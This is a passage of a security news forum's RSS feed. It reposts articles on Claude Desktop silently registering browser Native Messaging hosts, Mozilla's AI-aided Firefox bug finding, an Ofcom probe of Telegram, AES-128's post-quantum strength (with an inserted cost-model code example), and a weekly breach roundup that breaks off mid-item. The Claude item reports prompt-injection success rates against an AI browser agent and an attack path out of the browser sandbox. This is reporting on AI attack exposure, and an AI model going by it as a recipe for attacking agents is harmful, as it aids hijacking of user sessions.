	One app should not modify another app without asking for and receiving your explicit consent. Yet Anthropic's Claude Desktop for macOS installs files that affect other vendors' applications without disclosure, even before those applications have been installed, and authorizes browser extensions without consent.
</p>

<p>
	 
</p>

<p>
	Alexander Hanff, a privacy consultant and occasional contributor to<span> </span><em>The Register,</em><span> </span>contends this makes Claude Desktop "spyware" and amounts to a violation of European privacy law.
</p>

<p>
	 
</p>

<p>
	"I want to be blunt," Hanff wrote in a<span> </span><a href="https://www.thatprivacyguy.com/blog/anthropic-spyware/" rel="external nofollow">blog post</a><span> </span>over the weekend. "This is a dark pattern. It is also, in my professional opinion, a direct breach of Article 5(3) of<span> </span><a href="https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX:02002L0058-20091219" rel="external nofollow">Directive 2002/58/EC</a><span> </span>(the ePrivacy Directive) as well as a multitude of computer access and misuse laws (usually criminal law), on a scale large enough to matter, in a vendor which has spent considerable effort on being perceived as the safety conscious AI lab."
</p>

<p>
	 
</p>

<p>
	Article 5(3) requires service providers seeking access to a person's data to provide clear details about the data access request and to obtain consent unless access is strictly necessary to provide the service.
</p>

<div>
	 
</div>

<p>
	Hanff explains that he found the undisclosed file installation while trying to debug another application that used<span> </span><a href="https://developer.chrome.com/docs/extensions/develop/concepts/native-messaging" rel="external nofollow">Native Messaging</a>, an API for communicating between Chrome and other applications. Claude Desktop relies on the cross-platform Electron framework, which in turn relies on a bundled version of Chromium.
</p>

<p>
	 
</p>

<p>
	The file that Claude Desktop installed was:
</p>

<p>
	<code>com.anthropic.claude_browser_extension.json</code>
</p>

<p>
	 
</p>

<p>
	It's a Native Messaging manifest file that Chromium-based browsers consult when an extension asks them to run a local executable. The file pre-authorizes three different Chrome extension identifiers (e.g.<span> </span><a href="https://chromewebstore.google.com/detail/Claude/fcoeoabgfenejglbffodgkkbkcdhcgfn?hl=en-US" rel="external nofollow">Claude in Chrome extension</a>) so that associated browsers will run the binary identified in the manifest file.
</p>

<p>
	 
</p>

<p>
	Basically, Claude Desktop is setting up its AI model's ability to access various browsers for automated operation. And it does this for browsers not yet present on the user's device, so that those browsers will grant Claude access if they are installed at some point in the future.
</p>

<p>
	But Hanff claims he never installed any Anthropic browser extensions due to privacy and security concerns. Claude Desktop did so for him, without disclosure or permission.
</p>

<p>
	 
</p>

<p>
	Browser extensions magnify security and privacy challenges because they often request overly broad permissions. Hanff observes that Claude in Chrome has authenticated session access and can read web pages, fill out forms, and capture the screen. What's more, he says, the binary bridge application runs outside of the browser's sandbox at user privilege level, without surfacing any permission prompts.
</p>

<p>
	 
</p>

<p>
	Anthropic's approach has numerous problems, according to Hanff. It amounts to forced bundling across trust boundaries by writing configuration files for other vendors' browsers. It's invisible by default, with no opt-in. It's difficult to remove. It pre-authorizes browser extensions that haven't been installed. Its file is named in a way that fails to clarify the scope of what is being allowed. And it pre-authorizes non-present browsers to use the Native Messaging binary, among other concerns.
</p>

<p>
	 
</p>

<p>
	Hanff says, "Anthropic's own safety data states<span> </span><a href="https://claude.com/blog/claude-for-chrome" rel="external nofollow">Claude for Chrome</a><span> </span>is vulnerable to prompt injection at a 23.6 percent success rate without mitigations, and 11.2 percent with their current mitigations. … With the bridge pre-installed on the user's laptop, a successful prompt injection against Claude for Chrome has a path, through the extension, through the bridge, to a helper binary running outside the browser sandbox at user privilege."
</p>

<p>
	 
</p>

<p>
	Anthropic did not respond to a request for comment.
</p>

<p>
	 
</p>

<p>
	We note that the Claude Desktop native messaging host has<span> </span><a href="https://github.com/anthropics/claude-code/issues/20341" rel="external nofollow">an unfixed bug</a><span> </span>that was auto-closed on February 28th by a GitHub Actions bot. The problem is that the Claude Code and Claude Desktop native messaging host registrations conflict with one another, so the associated Chrome extension fails with Claude Code.
</p>

<p>
	 
</p>

<p>
	Noah M. Kenney, founder and principal consultant for advisory firm<span> </span><a href="https://digital520.com/" rel="external nofollow">Digital 520</a>, takes issue with Hanff's use of the term "spyware" but says Hanff's findings appear to support his legal reasoning.
</p>

<p>
	 
</p>

<p>
	"The technical claims here are largely testable and, as described, reproducible," said Kenney in an email to<span> </span><em>The Register</em>. "Independent reviewers can verify that identical Native Messaging manifests are written across multiple Chromium-based browser paths, that the activity is attributed at the OS level to the desktop application, and that installation events are recorded in the app's own logs. If those artifacts hold, the core behavior is difficult to dispute: the desktop app is registering a Native Messaging host across multiple browser environments, including ones the user has not actively chosen to integrate, and maintaining that registration persistently."
</p>

<p>
	 
</p>

<p>
	With the disclaimer that he's not an attorney, Kenney said the legal framing is more complicated.
</p>

<p>
	 
</p>

<p>
	"Article 5(3) of the ePrivacy Directive clearly applies to storing information on a user's device, so the act of writing these manifests is in scope. The key question is whether that action is 'strictly necessary' for a service the user actually requested. 
</p>

<p>
	 
</p>

<p>
	"Vendors will argue this is part of a unified product experience, but regulators, particularly in Europe, tend to interpret 'strictly necessary' narrowly. Silently installing cross-application integrations, especially into browsers the user has not opted into, is likely to fall outside that exemption, which carries credible regulatory risk."
</p>

<p>
	 
</p>

<p>
	Kenney said he would push back on the term "spyware" because it traditionally implies active and covert data exfiltration.
</p>

<p>
	 
</p>

<p>
	"What is described here is different," he said. "It is a pre-positioned integration layer that remains dormant until triggered by a browser extension, which is an important distinction. Regardless, the risk is still real as this creates a persistent, pre-authorized bridge from browser extensions into a local executable running outside the browser sandbox, installed without clear user awareness and resistant to removal. From a security perspective, that meaningfully expands the attack surface."
</p>

<p>
	 
</p>

<p>
	Kenney agrees that the way Anthropic has designed its software in this instance breaks a widely understood trust boundary.
</p>

<p>
	 
</p>

<p>
	"Users do not expect a desktop application to silently modify other applications, especially across vendors," he said. "European regulators, in particular, expect explicit opt-in, installation scoped only to user-selected integrations, and clear persistent controls with real revocation. This implementation falls short of that baseline. European enforcement is moving toward demonstrable, user-visible control rather than implied or deferred consent. Silent system modification across application boundaries is exactly the kind of pattern regulators are increasingly focused on."
</p>

<p>
	 
</p>

<p>
	Hanff told<span> </span><em>The Register</em><span> </span>that Anthropic has yet to respond to his post. He said he hasn't filed a formal complaint but intends to if the company fails to fix the Claude for Desktop installation process.
</p>

<p>
	 
</p>

<p>
	Kenney said, "Putting the legal ramifications aside, there is substantial reputational damage and loss of user trust that comes from a company that users perceive as being committed to safety and privacy releasing tools that seemingly undercut that posture."
</p>

<p>
	 
</p>

<p>
	<a href="https://www.theregister.com/2026/04/20/anthropic_claude_desktop_spyware_allegation/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">34676</guid><pubDate>Wed, 22 Apr 2026 18:40:18 +0000</pubDate></item><item><title>Mozilla: Anthropic&#x2019;s Mythos found 271 security vulnerabilities in Firefox 150</title><link>https://nsaneforums.com/news/security-privacy-news/mozilla-anthropic%E2%80%99s-mythos-found-271-security-vulnerabilities-in-firefox-150-r34668/</link><description><![CDATA[<h3>
	CTO says new AI model is “every bit as capable” as world’s best security researchers.
</h3>

<p>
	Earlier this month, Anthropic said its Mythos Preview model was so good at finding cybersecurity vulnerabilities that <a href="https://arstechnica.com/ai/2026/04/anthropic-limits-access-to-mythos-its-new-cybersecurity-ai-model/" rel="external nofollow">the company was limiting its initial release</a> to “a limited group of critical industry partners.” Since then, debate has raged over whether the model <a href="https://arstechnica.com/ai/2026/04/anthropics-mythos-ai-model-sparks-fears-of-turbocharged-hacking/" rel="external nofollow">presages an era of turbocharged AI-aided hacking</a> or if Anthropic is just building hype for what is <a href="https://arstechnica.com/ai/2026/04/uk-govs-mythos-ai-tests-help-separate-cybersecurity-threat-from-hype/" rel="external nofollow">a relatively normal step up on the ladder of advancing AI capabilities</a>.
</p>

<p>
	 
</p>

<p>
	Mozilla added some important data to that debate Tuesday, <a href="https://blog.mozilla.org/en/firefox/ai-security-zero-day-vulnerabilities/" rel="external nofollow">writing in a blog post</a> that early access to Mythos Preview had helped it pre-identify 271 security vulnerabilities in <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/150" rel="external nofollow">this week’s release of Firefox 150</a>. The results were significant enough to get Firefox CTO Bobby Holley to enthuse that, in the never-ending battle between cyberattackers and cyberdefenders, “defenders finally have a chance to win, decisively.”
</p>

<h2>
	“We’ve rounded the curve”
</h2>

<p>
	Holley didn’t go into detail on the severity of the hundreds of vulnerabilities that Mythos reportedly detected simply by analyzing the unreleased source code of Firefox’s latest version. But by way of comparison, he noted that Anthropic’s Opus 4.6 model found only 22 security-sensitive bugs when <a href="https://blog.mozilla.org/en/firefox/hardening-firefox-anthropic-red-team/" rel="external nofollow">analyzing Firefox 148 last month</a>.
</p>

<p>
	 
</p>

<p>
	The vulnerabilities identified by Mythos could have also been discovered either by <a href="https://about.gitlab.com/topics/devsecops/what-is-fuzz-testing/" rel="external nofollow">automated “fuzzing” techniques</a> or by having an “elite security researcher” reason their way through the browser’s complex source code, Holley writes. But using Mythos eliminated the need to “concentrate many months of costly human effort to find a single bug” in many cases, Holley added.
</p>

<p>
	 
</p>

<p>
	By identifying bugs so efficiently, Holley writes that AI tools like Mythos tilt the cybersecurity balance toward defenders, who benefit when discovering vulnerabilities becomes cheaper for both sides. “Computers were completely incapable of doing this a few months ago, and now they excel at it,” Holley writes. “We have many years of experience picking apart the work of the world’s best security researchers, and Mythos Preview is every bit as capable.”
</p>

<p>
	 
</p>

<p>
	In <a href="https://www.wired.com/story/mozilla-used-anthropics-mythos-to-find-271-bugs-in-firefox/" rel="external nofollow">an interview with Wired</a>, Holley said that, from now on, this kind of AI-aided vulnerability analysis is something that “every piece of software is going to have to [engage with], because every piece of software has a lot of bugs buried underneath the surface that are now discoverable.” And while it’s possible that future models more advanced than Mythos may be able to find bugs that current models miss, Holley said he was confident that “at least on the Firefox side, having had a bit of a head start here, that we’ve rounded the curve.”
</p>

<p>
	 
</p>

<p>
	Running through the AI-aided defense gauntlet could be especially important for the open source projects that underpin much of the modern Internet. That’s both because their public codebases are easier for AI systems to explore for vulnerabilities and because many such projects rely on wildly insufficient volunteer maintenance for their security.
</p>

<p>
	 
</p>

<p>
	In <a href="https://www.nytimes.com/2026/04/15/opinion/mythos-open-souce-internet.html" rel="external nofollow">a New York Times essay last week</a>, Mozilla CTO Raffi Krikorian argued that the human difficulty of both finding bugs and writing complex software has created a kind of balance in cyberthreat research that Mythos could break wide open. “The programmer who gave 20 years of his life to maintain [open source] code that runs inside products used by billions of people? He doesn’t have access to Mythos yet. He should,” Krikorian wrote.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/ai/2026/04/mozilla-anthropics-mythos-found-271-zero-day-vulnerabilities-in-firefox-150/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 22 April 2026 at 1:34 pm AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">34668</guid><pubDate>Wed, 22 Apr 2026 03:35:27 +0000</pubDate></item><item><title>Telegram faces UK ban threat as Ofcom launches massive safety investigation</title><link>https://nsaneforums.com/news/security-privacy-news/telegram-faces-uk-ban-threat-as-ofcom-launches-massive-safety-investigation-r34661/</link><description><![CDATA[<h3>
	The UK regulator is cracking down on Telegram and teen chat apps over illegal content, with potential fines reaching 10% of global revenue.
</h3>

<p>
	The UK digital regulator, Ofcom, has launched enforcement action against Telegram after evidence suggested child sexual abuse material (CSAM) was being shared on the platform. The investigation is happening under the <a automate_uuid="d0c0028b-7ea1-457c-aa1b-ab9e9bfa8017" href="https://www.neowin.net/news/uk-to-strengthen-online-safety-laws-to-protect-vulnerable-adults/" rel="external nofollow">Online Safety Act</a> and will look to see whether the platform is meeting its obligations to stop CSAM from being shared.
</p>

<p>
	 
</p>

<p>
	The regulator also <a automate_uuid="a01cb134-c6e9-4c7a-a2e8-3581fab7134f" href="https://www.ofcom.org.uk/online-safety/illegal-and-harmful-content/ofcom-investigates-telegram-and-teen-chat-sites" rel="external nofollow">revealed</a> that it was opening investigations into Teen Chat and Chat Avenue to see whether they were meeting their duties to protect children from being groomed by predators.
</p>

<p>
	 
</p>

<p>
	Under the OSA, platforms facilitating user-to-user services must tackle the sharing of CSAM content. Ofcom said that it works with law enforcement agencies to identify platforms that are being used by offenders to share CSAM. Most recently, it received evidence from the Canadian Centre for Child Protection about the alleged existence and sharing of CSAM on Telegram.
</p>

<p>
	 
</p>

<p>
	It has decided to launch the investigation on the back of this report. If Ofcom finds the company has broken the law, it can require Telegram to take specific actions to come into compliance. It can also impose fines of 18 million pounds or 10% of qualifying worldwide revenue, whichever is higher. If it continues not to comply, it could ask a court to block Telegram in the UK or require payment providers and advertisers to withdraw their services from the platform.
</p>

<p>
	 
</p>

<p>
	Commenting on this development, Suzanne Cater, Director of Enforcement at Ofcom, said:
</p>

<p>
	 
</p>

<p style="margin-left:40px">
	“Child sexual exploitation and abuse causes devastating harm to victims, and making sure sites and apps tackle this is one of our highest priorities. It’s why we work so closely with partners in law enforcement and child protection organisations to identify where these harms are occurring and hold providers to account where they’re failing to meet their obligations.
</p>

<p>
	 
</p>

<p style="margin-left:40px">
	“Progress has undeniably been made, particularly with file-sharing services, which are too often used to share horrific child sexual abuse imagery. But this problem extends to big platforms too, and teen-focused chat services are too easily being used by predators to groom children. These firms must do more to protect children, or face serious consequences under the Online Safety Act.”
</p>

<p>
	 
</p>

<p>
	<em>Let us know in the comments whether you use Telegram and what you think the outcome of this investigation will be.</em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/telegram-faces-uk-ban-threat-as-ofcom-launches-massive-safety-investigation/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 22 April 2026 at 7:13 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">34661</guid><pubDate>Tue, 21 Apr 2026 21:14:05 +0000</pubDate></item><item><title>Contrary to popular superstition, AES 128 is just fine in a post-quantum world</title><link>https://nsaneforums.com/news/security-privacy-news/contrary-to-popular-superstition-aes-128-is-just-fine-in-a-post-quantum-world-r34660/</link><description><![CDATA[<h3>
	A stubborn misconception is hampering the already hard work of quantum readiness.
</h3>

<p>
	With growing focus on the existential threat quantum computing poses to some of the most crucial and widely used forms of encryption, cryptography engineer Filippo Valsorda wants to make one thing absolutely clear: Contrary to popular mythology that refuses to die, AES 128 is perfectly fine in a post-quantum world.
</p>

<p>
	 
</p>

<p>
	AES 128 is the most widely used variety of the <a href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard" rel="external nofollow">Advanced Encryption Standard</a>, a block cipher suite formally adopted by NIST in 2001. While the specification allows 192- and 256-bit key sizes, AES 128 was widely considered to be the preferred one because it meets the sweet spot between computational resources required to use it and the security it offers. With no known vulnerabilities in its 30-year history, a brute-force attack is the only known way to break it. With 2<sup>128</sup> or 3.4 x 10<sup>38</sup> possible key combinations, such an attack would take about 9 billion years using the entire bitcoin mining resources as of 2026.
</p>

<h2>
	It boils down to parallelization
</h2>

<p>
	Over the past decade, something interesting happened to all that public confidence. Amateur cryptographers and mathematicians twisted a series of equations known as <a href="https://en.wikipedia.org/wiki/Grover%27s_algorithm" rel="external nofollow">Grover’s algorithm</a> to declare the death of AES 128 once a cryptographically relevant quantum computer (CRQC) came into being. They said a CRQC would halve the effective strength to just 2<sup>64</sup>, a small enough supply that—if true—would allow the same bitcoin mining resources to brute force it in less than a second (the comparison is purely for illustration purposes; a CRQC almost certainly couldn’t run like clusters of bitcoin ASICs and more importantly couldn’t parallelize the workload as the amateurs assume).
</p>

<p>
	 
</p>

<p>
	On Monday, Valsorda finally channeled years’ worth of frustration, fueled by the widely held misunderstanding, into a <a href="https://words.filippo.io/128-bits/" rel="external nofollow">blog post</a> titled “Quantum Computers Are Not a Threat to 128-bit Symmetric Keys.”
</p>

<p>
	 
</p>

<p>
	“There’s a common misconception that quantum computers will ‘halve’ the security of symmetric keys, requiring 256-bit keys for 128 bits of security,” he wrote. “That is not an accurate interpretation of the speedup offered by quantum algorithms, it’s not reflected in any compliance mandate, and risks diverting energy and attention from actually necessary post-quantum transition work.”
</p>

<p>
	 
</p>

<p>
	That’s the easy part of the argument. The much harder part is the math and physics that explain it. At its highest level, it comes down to a fundamental difference in the way a brute-force search works on classical computers versus the way it works using Grover’s algorithm. Classical computers can perform multiple searches simultaneously, a capability that allows large tasks to be broken into smaller pieces to complete the overall job faster. Grover’s algorithm, by contrast, requires a long-running serial computation, where each search is done one at a time.
</p>

<p>
	 
</p>

<p>
	“What makes Grover special is that as you parallelize it, its advantage over non-quantum algorithms gets smaller,” Valsorda said in an interview. He continued:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		Imagine it with small numbers: let’s say there are 256 possible combinations to a lock. A normal attack would take 256 tries. You decide it’s too long, so you get three friends and you each do 64 tries. That’s the classical parallelization. With Grover you could in theory do √256 = 16 tries in a row, but if that’s still too long, you again look for help from three friends. Each has to do √(256/4) = 8 tries.
	</p>

	<p>
		 
	</p>

	<p>
		So in total you do 8*4=32 tries, which is more than the 16 you would have done alone! Asking for help to parallelize the attack made the attack slower overall. Which is not the case for classical attacks.
	</p>

	<p>
		 
	</p>

	<p>
		Of course the numbers are way larger, but if we apply any reasonable constraint on the attacker (like having to finish a run in 10 years), the total work becomes so much more than 2<sup>64</sup>.
	</p>

	<p>
		 
	</p>

	<p>
		Also, 2<sup>64</sup> was never the right number, because that pretends you can do AES as a single operation on a single qubit. This is somewhat orthogonal. The combination of these two observations turns the actual cost into 2<sup>104</sup> give or take, which is well beyond the threshold for security.
	</p>
</blockquote>

<p>
	Sophie Schmieg, a senior cryptography engineer at Google, explained it this way:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		With a normal brute force search, if I interrupt it halfway through, I have roughly a 50% chance of it already being successful. So I can have two computers doing the search, each over 50% of the keys, and be done in half the time. But with Grover’s, if I interrupt halfway through, the probability of getting the correct answer is only 25%. So instead of using two computers on half of the search space, I now need four.
	</p>

	<p>
		 
	</p>

	<p>
		So if you look at coreseconds, the classical algorithms cost what they cost, independent of how many computers you use in parallel. You can increase cores and your time goes down by the corresponding amount. But with the quantum algorithm, coreseconds are not independent of the parallelization strategy. Having more cores does not reduce the time by the same amount, to the point that if you went to the maximally parallel instance where each QC has to check only a single key, you need 2<sup>128</sup> QCs, and not 2<sup>64</sup>, i.e. you’re no better than classical.
	</p>
</blockquote>

<p>
	Valsorda’s post provides a more mathematically detailed explanation, as does <a href="https://www.youtube.com/watch?v=RQWpF2Gb-gU" rel="external nofollow">this video</a>.
</p>

<p>
	 
</p>

<p>
	Valsorda listed a litany of sources that support the assertion that AES is perfectly acceptable in a post-quantum world, including from the National Institute of Standards and Technology (<a href="https://csrc.nist.gov/Projects/Post-Quantum-Cryptography/Post-Quantum-Cryptography-Standardization/Evaluation-Criteria/Security-(Evaluation-Criteria)" rel="external nofollow">here</a>, <a href="https://nvlpubs.nist.gov/nistpubs/ir/2024/NIST.IR.8547.ipd.pdf" rel="external nofollow">here</a>, and <a href="https://csrc.nist.gov/Projects/post-quantum-cryptography/faqs" rel="external nofollow">here</a>), the German Federal Office for Information Security (<a href="https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/TechGuidelines/TG02102/BSI-TR-02102-1.pdf?__blob=publicationFile&amp;v=14" rel="external nofollow">here</a>), and Samuel Jaques, an assistant professor in the Department of Combinatorics and Optimization at the University of Waterloo (<a href="https://ches.iacr.org/2024/Jaques_CHES_2024.pdf" rel="external nofollow">here</a>).
</p>

<p>
	 
</p>

<p>
	The exception to these recommendations is spelled out in the NSA’s version 2 of the Commercial National Security Algorithm Suite, which mandates AES 256. Valsorda said requirements for 256-level security were in place even in the predecessor algorithm suite, and weren’t specific to quantum readiness. “As far as I can tell, its intention is to avoid the very same fragmentation introduced by security levels by picking one oversized primitive for all settings.”
</p>

<p>
	 
</p>

<p>
	He further said 256-bit AES is warranted in certain cases, such as systems that generate an enormous number of random keys, where the <a href="https://en.wikipedia.org/wiki/Birthday_problem" rel="external nofollow">birthday paradox</a> makes it increasingly likely that two keys randomly end up equal: with 128-bit keys a collision becomes likely after roughly 2<sup>64</sup> keys, whereas with 256-bit keys the bound is far out of reach.
</p>
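<p>
	The following is an added example, not code from Valsorda’s post, from the quoted speaker or from the Ars Technica article, that puts the “coreseconds” argument quoted above into numbers, together with the birthday-bound point about key collisions. It assumes an idealised cost model (one key test per step on a classical machine, about 2<sup>n/2</sup> Grover iterations for a quantum machine assigned 2<sup>n</sup> keys, no constants or error-correction overhead) and works entirely in log2 units, so a value of 64 means 2<sup>64</sup> steps.
</p>

```javascript
// Added example, not from Valsorda's post or the article: brute-force cost
// accounting for a k-bit key, classical vs Grover, spread over 2^m machines.
// All quantities are log2 values, so a wallClock of 64 means 2^64 steps.
// Assumed cost model: a classical machine tests one key per step; a quantum
// machine assigned a subspace of 2^n keys needs about 2^(n/2) Grover
// iterations (constants and error correction ignored).

function classicalCost(keyBits, log2Machines) {
  // Each machine tests 2^(k-m) keys; total work is always 2^k, however
  // many machines are used.
  const wallClock = keyBits - log2Machines;
  return { wallClock, machineSteps: wallClock + log2Machines };
}

function groverCost(keyBits, log2Machines) {
  // Each machine searches 2^(k-m) keys in 2^((k-m)/2) iterations, so the
  // total work grows as 2^((k+m)/2): parallelism buys only a square root.
  const wallClock = (keyBits - log2Machines) / 2;
  return { wallClock, machineSteps: wallClock + log2Machines };
}

// log2 of the number of machines needed to finish within 2^t steps.
function machinesForDeadline(keyBits, log2Time, quantum) {
  return quantum ? keyBits - 2 * log2Time : keyBits - log2Time;
}

// Birthday bound for random key collisions: with 2^j uniformly random k-bit
// keys, P(some two are equal) is about 2^(2j - k - 1) while that is small.
// Returns log2 of the probability.
function log2KeyCollisionProbability(keyBits, log2Keys) {
  return 2 * log2Keys - keyBits - 1;
}

function costTable(keyBits) {
  return [0, 32, 64, 96, keyBits].map((m) => ({
    log2Machines: m,
    classical: classicalCost(keyBits, m),
    grover: groverCost(keyBits, m),
  }));
}

for (const row of costTable(128)) {
  const c = row.classical;
  const g = row.grover;
  console.log(
    `2^${row.log2Machines} machines: classical 2^${c.wallClock} wall-clock / ` +
      `2^${c.machineSteps} machine-steps; Grover 2^${g.wallClock} wall-clock / ` +
      `2^${g.machineSteps} machine-steps`
  );
}
console.log(
  `Quantum machines to crack AES-128 in 2^32 steps: 2^${machinesForDeadline(128, 32, true)}`
);
console.log(
  `P(collision) among 2^40 random AES-128 keys: 2^${log2KeyCollisionProbability(128, 40)}; ` +
    `among 2^40 AES-256 keys: 2^${log2KeyCollisionProbability(256, 40)}`
);
```

<p>
	The table makes the quoted point concrete: one quantum machine needs 2<sup>64</sup> wall-clock steps, the same as 2<sup>64</sup> classical machines, but pushing the Grover wall-clock time down to a single step requires 2<sup>128</sup> quantum machines and 2<sup>128</sup> machine-steps in total, exactly the classical budget. The birthday figures show why a design that mints 2<sup>40</sup> random keys still has a comfortable margin at 128 bits (collision probability about 2<sup>-49</sup>) and an absurd one at 256 bits.
</p>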

<p>
	 
</p>

<p>
	So the next time you hear someone say quantum computing halves the security of AES, kindly remind them that’s a superstition distracting engineers from the real and considerable work of preparing the world for the advent of a CRQC. It’s a tall enough order updating the asymmetric algorithms known to be vulnerable to <a href="https://en.wikipedia.org/wiki/Shor's_algorithm" rel="external nofollow">Shor’s algorithm</a>, which breaks them in polynomial time, roughly <a href="https://en.wikipedia.org/wiki/Time_complexity" rel="external nofollow">cubic</a> in the key length, a massive advantage compared with the sub-exponential (for RSA) or fully exponential (for elliptic curves) time the best classical attacks require.
</p>

<p>
	 
</p>

<p>
	“Conflating necessary and unnecessary changes will cause needless churn and take resources away from the urgent updates,” Valsorda argued. “We’re lucky we can leave the symmetric cryptography (sub-)systems untouched; we should take that blessing and focus on the work that actually needs doing, which is plenty.”
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2026/04/contrary-to-popular-superstition-aes-128-is-just-fine-in-a-post-quantum-world/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 22 April 2026 at 7:12 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">34660</guid><pubDate>Tue, 21 Apr 2026 21:13:09 +0000</pubDate></item><item><title>Security News This Week: It Takes 2 Minutes to Hack the EU-s New Age-Verification App</title><link>https://nsaneforums.com/news/security-privacy-news/security-news-this-week-it-takes-2-minutes-to-hack-the-eu-s-new-age-verification-app-r34642/</link><description><![CDATA[<p>
	<span><strong>Plus: Major data breaches at a gym chain and hotel giant, a disruptive DDoS attack against Bluesky, dubious ICE hires, and more.</strong></span>
</p>

<p>
	 
</p>

<p>
	<strong>Planning a big</strong> night out at Madison Square Garden? Have fun—but don’t say we didn’t warn you.
</p>

<p>
	 
</p>

<p>
	A WIRED investigation this week revealed new details about the private surveillance state instituted by MSG owner Jim Dolan and his head of security, John Eversole.
</p>

<p>
	 
</p>

<p>
	According to court records and WIRED sources, visitors to the Garden and some other Dolan-owned venues have been subjected to face recognition, social media monitoring, in-person surveillance, and more.
</p>

<p>
	 
</p>

<p>
	The US government’s warrantless wiretap powers hit a roadblock this week. Despite a push from President Donald Trump for a long-term reauthorization of the so-called Section 702 spy program, 20 Republican lawmakers in the House of Representatives voted against a full reauthorization, forcing Speaker Mike Johnson to merely extend the program for an additional 10 days.
</p>

<p>
	 
</p>

<p>
	Meta’s Ray-Ban and Oakley AI smartglasses have an image problem—for good reason. More than 70 civil society groups, including the ACLU and the National Organization for Women, sent a letter to the company this week, demanding that it abandon any plans it may have to equip its AI glasses with face-recognition features. The groups argue that including face recognition in the wearable devices, which can already surreptitiously record videos of people, would further erode any semblance of privacy and potentially facilitate stalkers, domestic abusers, and federal agents.
</p>

<p>
	 
</p>

<p>
	Nonconsensual deepfake nudes are a scourge at schools around the world, according to an analysis by WIRED and Indicator. By tracking publicly reported incidents of deepfake “nudify” tech used against middle- and high-school-aged girls, we were able to identify more than 600 victims in 28 countries around the world.
</p>

<p>
	 
</p>

<p>
	You might think banning a $20 billion black market for scammers from your platform would be a no-brainer. But not if you’re Telegram. A WIRED investigation found that the messaging app continued to host Xinbi Guarantee despite the UK government’s designating it a facilitator of human trafficking and sanctioning the largest-ever online marketplace of its kind. Crypto-tracing firm Elliptic says that Xinbi carried out another $505 million in transactions in the 19 days after the UK issued its sanction.
</p>

<p>
	 
</p>

<p>
	The AI race has finally entered the cybersecurity lap. After Anthropic revealed its new model, Mythos, as a unique risk to the security status quo, OpenAI announced that it, too, has a new cybersecurity strategy, and a new model to go with it—GPT-5.4-Cyber.
</p>

<p>
	 
</p>

<p>
	That’s not all! Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>It Takes 2 Minutes to Hack the EU’s New Age Verification App</strong></span>
</p>

<p>
	 
</p>

<p>
	The European Commission this week released its free, open source app for verifying the ages of visitors to social networks and pornography websites. At a press conference on Wednesday, European Commission president Ursula von der Leyen proclaimed that, with the release of the app, “there are no more excuses” for platforms that fail to check users’ ages. That, however, was before experts found the app to be a security disaster.
</p>

<p>
	 
</p>

<p>
	As reported by Politico, security consultant Paul Moore claimed on X to have found a series of security issues with the app that allowed him to hack it “in less than 2 minutes.” The issues include how the app reportedly stores a user-created PIN that could allow an attacker to easily take over that person’s app profile. (Baptiste Robert, a whitehat hacker, confirmed the vulnerability to Politico.) Tagging von der Leyen in his post, Moore concluded, “This product will be the catalyst for an enormous breach at some point. It's just a matter of time.”
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>A Gym Chain and a Hotel Giant Disclose Major Data Breaches</strong></span>
</p>

<p>
	 
</p>

<p>
	Europe's largest gym chain, Basic-Fit, confirmed a major data breach on Monday, revealing that the bank details of roughly a million customers were compromised. Around 200,000 members in the Netherlands alone were affected. The stolen data includes bank details along with customers' names, home and email addresses, phone numbers, and dates of birth. A spokesperson told The Register that members in Belgium, France, Germany, Luxembourg, and Spain were also similarly hit through a single system that records member visits to clubs. No passwords, which Basic-Fit says it does not store, were reportedly compromised.
</p>

<p>
	 
</p>

<p>
	The same day, global travel and hotel reservation giant Booking.com confirmed that hackers may have extracted customer data including names, email addresses, phone numbers, and booking details. The company informed TechCrunch that it “noticed some suspicious activity” and “took action to contain the issue.” Company notices posted by purported customers on Reddit appear to disclose a breach touching on “anything” the users “may have shared with the accommodation.” TechCrunch reported that Booking.com had declined to share details about the scope of the breach, but did separately tell The Guardian that no “financial information” was lost.
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>Bluesky Buckles Under DDoS Attack</strong></span>
</p>

<p>
	 
</p>

<p>
	Bluesky’s site and app struggled through Thursday after what the company confirmed was a distributed denial-of-service attack. Chief operations officer Rose Wang said the “sophisticated” attack began April 15 around 8:40 pm ET and caused intermittent failures across feeds, notifications, and search. The company said it has not seen any evidence of unauthorized access to user data.
</p>

<p>
	 
</p>

<p>
	The outages hit Bluesky’s own infrastructure but spared communities like Blacksky that run their own instances on the underlying AT Protocol. Blacksky told TechCrunch it has seen a significant spike in migration requests over the past 12 hours, as users and rival ATmosphere operators promote alternatives. As of Friday afternoon, its status page shows the service fully operational.
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>ICE Offered Jobs to Applicants With Dubious Backgrounds</strong></span>
</p>

<p>
	 
</p>

<p>
